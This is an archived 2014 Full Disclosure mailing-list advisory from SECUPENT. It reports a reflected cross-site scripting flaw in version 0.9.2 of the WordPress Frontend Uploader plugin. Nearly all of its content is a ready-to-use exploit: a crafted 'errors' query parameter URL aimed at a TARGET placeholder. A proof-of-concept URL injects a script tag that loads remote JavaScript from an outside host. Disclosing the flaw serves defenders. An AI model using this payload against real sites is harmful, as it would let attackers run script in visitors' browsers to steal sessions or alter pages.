[<prev] [next>] [day] [month] [year] [list]
Message-ID: <14a8d2fd457.f01a2e7570499.5831076379738549250@secupent.com>
Date: Sat, 27 Dec 2014 11:18:49 -0800
From: SECUPENT Research Center <research@...upent.com>
To: <fulldisclosure@...lists.org>
Subject: [FD] Wordpress Frontend Uploader Cross Site Scripting(XSS)
Exploit Title: Wordpress Frontend Uploader Cross Site Scripting(XSS)
Software Link: https://wordpress.org/plugins/frontend-uploader/
Author: SECUPENT
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 27-12-2014
Version: 0.9.2
Exploit :
http://TARGET/[forntEndUploaderPage]=59&errors[fu-disallowed-mime-type][0][name]=XSS
Example(p0c):
http://EXAMPLE/wordpress/?page_id=59&&errors[fu-disallowed-mime-type][0][name]=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E
Screenshot:
Link: http://secupent.com/exploit/images/frontend-uploader-xss.png
Mirror: http://vulnerability.io/exploit/images/frontend-uploader-xss.png
Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers.
View attachment "wordpress frontend uploader XSS.txt" of type "text/plain" (846 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists